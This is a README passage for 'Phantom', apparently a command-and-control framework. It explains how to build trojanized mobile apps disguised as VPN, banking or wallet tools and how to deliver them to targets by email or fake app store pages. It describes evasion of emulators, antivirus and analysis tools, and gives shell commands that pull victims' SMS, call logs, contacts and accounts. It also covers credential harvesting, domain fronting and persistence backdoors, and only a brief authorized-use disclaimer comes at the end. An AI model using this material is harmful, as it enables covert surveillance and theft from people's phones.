- Permissions: Internet, Location, Camera, Mic, Contacts, SMS, Call Log, Storage, Phone State
- Calls back to Phantom's mobile REST API (
/api/v1/mobile/register+/api/v1/mobile/checkin) - Executes shell commands from C2 and returns output
Requirements:
- Android SDK with build-tools (aapt, d8, apksigner)
- Java JDK 8+ (javac)
- Target device: Android 5+ (API 21+), x86_64 for emulators
Full exploitation guide with network setup, deployment steps, protocol details, and post-exploitation commands: see
docs/mobile-exploitation-guide.html(render to PDF withweasyprint docs/mobile-exploitation-guide.html guide.pdf)
# Generate a fake VPN app with full UI
phantom > generate app vpn-shield https://YOUR-C2-IP:8080
# Build the APK
cd build/payloads/apps/vpn_shield
# Open in Android Studio → Build → Build APK
# Or: gradle assembleRelease
# Deliver to target
# - Send APK via email/message
# - Host on fake app store page
# - QR code linking to download
# When target installs and opens the app
# - They see a legitimate VPN interface
# - Background service starts C2 callback
# - Agent appears in Phantom: "phantom > agents"
# Interact with mobile agent
phantom > interact toxic-cobra
phantom [toxic-cobra] > shell id
phantom [toxic-cobra] > sysinfo
phantom [toxic-cobra] > shell cat /proc/version| Category | Templates |
|---|---|
| Productivity | Calculator, QR Scanner, PDF Viewer, Notes, File Manager |
| Utility | Flashlight, WiFi Analyzer, Battery Saver, Cleaner, Speed Test |
| Security | VPN Shield, Password Manager, Authenticator, Antivirus Pro |
| Finance | Crypto Wallet, Banking App, Expense Tracker |
| Social | Chat Messenger, Video Call, Dating Connect |
| Entertainment | Music Player, Live TV, Game Hub |
| Corporate | Company Portal, HR Self-Service, IT Support |
- Realistic UI — category-specific interface (banking dashboard, security shield, etc.)
- Background C2 service — survives app close, runs silently
- Boot persistence — auto-starts when device reboots
- Remote shell — execute commands on the device
- Device info — model, OS, manufacturer, device ID
- Evasion suite — anti-emulator, anti-debug, anti-Frida, anti-AV, sandbox timing delay
# Android-specific payloads (stagers + phishing)
phantom > generate android https://YOUR-C2-IP:8080
# iOS-specific payloads (MDM profile + Apple ID phishing)
phantom > generate ios https://YOUR-C2-IP:8080All generated apps automatically include evasion that:
- Detects emulators (Genymotion, Nox, BlueStacks, QEMU)
- Detects security apps (25+ AV/MDM packages)
- Detects Frida instrumentation (3 detection methods)
- Detects debuggers and analysis tools
- Delays C2 callback 60-120s to outlast sandbox analysis
- Stays fully dormant if any analysis is detected
Once the agent is registered, send these via the Web UI or CLI:
| Command | Purpose |
|---|---|
whoami |
Current user (e.g. u0_a152) |
id |
Full identity + groups (inet, everybody, cache) |
getprop ro.product.model |
Device model |
getprop ro.build.version.release |
Android version |
settings get secure android_id |
Unique device ID |
pm list packages -3 |
Third-party installed apps |
content query --uri content://sms |
Read SMS messages |
content query --uri content://call_log/calls |
Call history |
content query --uri content://contacts/phones |
Contact list |
dumpsys wifi |
Saved WiFi networks |
dumpsys account |
Google accounts on device |
dumpsys telephony.registry |
Cell tower info / location |
dumpsys battery |
Battery state |
ls /sdcard/DCIM/Camera/ |
List photos |
ls /sdcard/Download/ |
List downloads |
cat /proc/net/arp |
ARP table (nearby devices) |
netstat -tlnp |
Open ports / listening services |
| Endpoint | Method | Purpose |
|---|---|---|
/api/v1/mobile/register |
POST | First-time agent registration (JSON) |
/api/v1/mobile/checkin |
POST | Periodic check-in — receives tasks, returns results |
/api/v1/creds |
POST | Credential harvesting receiver (from phishing pages) |
server:
database: "data/phantom.db"
rsa_private_key: "configs/server.key"
rsa_public_key: "configs/server.pub"
default_sleep: 10
default_jitter: 20
listeners:
- name: "default-https"
type: "https"
bind: "0.0.0.0:443"
profile: "default"
tls_cert: "configs/server.crt"
tls_key: "configs/server-tls.key"
- name: "fallback-http"
type: "http"
bind: "0.0.0.0:8080"
profile: "default"
- name: "ws-c2"
type: "ws"
bind: "0.0.0.0:8888"
profile: "default"WebSocket transport provides persistent bidirectional connections that look like legitimate browser WS traffic and defeat HTTP request/response correlation analysis.
Supported types: ws (plaintext) and wss (TLS — supply tls_cert + tls_key).
# Create and start a WS listener from the CLI
phantom > listeners create ws-c2 ws 0.0.0.0:8888
phantom > listeners start ws-c2
From the Web UI: select WebSocket (ws://) or WebSocket TLS (wss://) in the listener type dropdown.
Agent URL format: ws://C2-IP:8888 or wss://C2-IP:8889
Three built-in profiles in configs/profiles/:
- default.yaml — Generic API traffic (
/api/v1/status) - microsoft.yaml — Microsoft 365/Azure (
/common/oauth2/v2.0/token) - cloudflare.yaml — Cloudflare Workers (
/cdn-cgi/rum) — includes commented domain fronting example
Profile fields: name, register_uri, checkin_uri, decoy_uris, user_agent, headers, content_type, decoy_response, front_domain (SNI override for domain fronting), host_header (HTTP Host override for domain fronting).
Start the browser dashboard alongside the CLI:
phantom > webui
[+] Web UI started: http://127.0.0.1:3000
The Web UI requires authentication. Default credentials:
Username: admin
Password: phantom
All pages and API endpoints are protected — no anonymous access.
- Dashboard — real-time stats, beacon graphs, network topology, engagement timer
- Agents — card view + table view, rename agents, delete dead agents
- Listeners — create, start/stop, save presets, one-click launch
- Tasks — full task history with output across all agents
- Terminal — colored output, command history, quick-action buttons, SOCKS proxy, sleep control
- Payloads — generator with listener preset selector, obfuscation options, auto-download
- Backdoors — binary backdoor + 10 persistence types (DLL sideload, WMI, registry, etc.)
- Files — OS-adaptive file browser with clickable folders, screenshot/process viewer
- Credentials — add/view/remove harvested creds with type tagging
- Loot — browse captured output by type (creds, files, screenshots, keylogs)
- Pivot Map — canvas network graph showing agents by subnet
- IOC Dashboard — tracks files, connections, processes, persistence artifacts
- Session Replay — replay any agent's command history with timestamps
- Templates — 6 built-in command templates + MITRE ATT&CK mapping + auto-tasks
- Audit — operator audit log (who sent what to which agent)
- Events — event log + engagement notes
- Theme — light/dark mode toggle with persistence
| Endpoint | Method | Description |
|---|---|---|
/login |
GET/POST | Login page and authentication |
/logout |
GET | End session |
/api/agents |
GET | List all agents |
/api/agent/{name} |
GET | Agent detail with task history |
/api/agent/remove |
POST | Delete a dead agent |
/api/agent/rename |
POST | Rename an agent |
/api/listeners |
GET | List all listeners |
/api/listener/create |
POST | Create and start a listener |
/api/listener/start |
GET | Start a stopped listener |
/api/listener/stop |
GET | Stop a running listener |
/api/presets |
GET/POST | Manage listener presets |
/api/tasks |
GET | All tasks across agents |
/api/events |
GET | Event log |
/api/cmd |
POST | Send command to an agent |
/api/payload/generate |
POST | Generate any payload type |
/api/payload/download |
GET | Download generated payload |
/api/payload/types |
GET | List available payload types |
/api/payload/apps |
GET | List mobile app templates |
/api/payload/backdoor |
POST | Generate persistence backdoor |
/api/payload/backdoor/binary |
POST | Backdoor an executable |
/api/payload/backdoor/types |
GET | List backdoor types |
/api/tunnel/start |
POST | Start SOCKS5 tunnel through agent |
/api/tunnel/stop |
GET | Stop SOCKS5 tunnel |
/api/tunnel/list |
GET | List active tunnels |
/api/loot |
GET | Browse all captured loot |
/api/templates |
GET/POST | Command templates CRUD |
/api/autotasks |
GET/POST | Auto-task configuration |
/api/auditlog |
GET | Operator audit log |
/api/notes?agent= |
GET/POST | Read/add agent notes |
/api/search?q= |
GET | Search all task output |
/api/operators |
GET | List online operators |
/api/filebrowser |
GET | Request directory listing from agent |
/api/screenshot |
GET | Request screenshot from agent |
/api/processlist |
GET | Request process list from agent |
Multiple pentesters can use the same server simultaneously:
- Each operator logs in with their own credentials
- Agent notes show which operator added them
/api/operatorsshows who's currently online- CLI and Web UI can be used at the same time
phantom > report md # Markdown report with full activity timeline
phantom > report csv # CSV export of all commands and output
phantom > report all # Both formats
Reports saved to reports/ with timestamps. Includes: executive summary, per-agent timelines, command output, infrastructure details.
phantom > webhook slack https://hooks.slack.com/services/T.../B.../xxx
phantom > webhook discord https://discord.com/api/webhooks/xxx/yyy
phantom > webhook test
Auto-notifies on: new agent registration, agent death, listener events.
phantom/
cmd/
server/ Server entrypoint
agent/ Agent entrypoint
keygen/ RSA keypair generator
e2etest/ End-to-end test runner
internal/
server/ Core server, config, webhooks
listener/ HTTP/HTTPS/WS/WSS/DNS/TCP listeners + malleable profiles + SMB pipes
agent/ Agent manager + builder
task/ Task dispatcher + queues
crypto/ RSA-2048, AES-256-GCM, key exchange
protocol/ Wire protocol + msgpack serialization
db/ SQLite database + repositories
cli/ CLI shell (readline), tables, reporting
webui/ Web dashboard (embedded HTML/JS)
implant/ Agent: shell, file, screenshot, persist, AD, BOF, evasion,
token, keylogger, SOCKS, creds, pivot, staging
payloads/ Payload generator (web shells, stagers, macros)
util/ Shared utilities
configs/ Server config + malleable profiles
scripts/ Helper scripts
docs/ Documentation + screenshots
Dockerfile Multi-stage Docker build
docker-compose.yml One-line deployment
This tool is designed for authorized red team engagements and security research only.
Unauthorized access to computer systems is illegal. You are responsible for ensuring you have proper authorization before using this tool. The author accepts no liability for misuse.
Always:
- Obtain written authorization before testing
- Follow your organization's rules of engagement
- Document all activities
- Report findings responsibly
Opeyemi Kolawole - GitHub
BSD 3-Clause License - see LICENSE for details.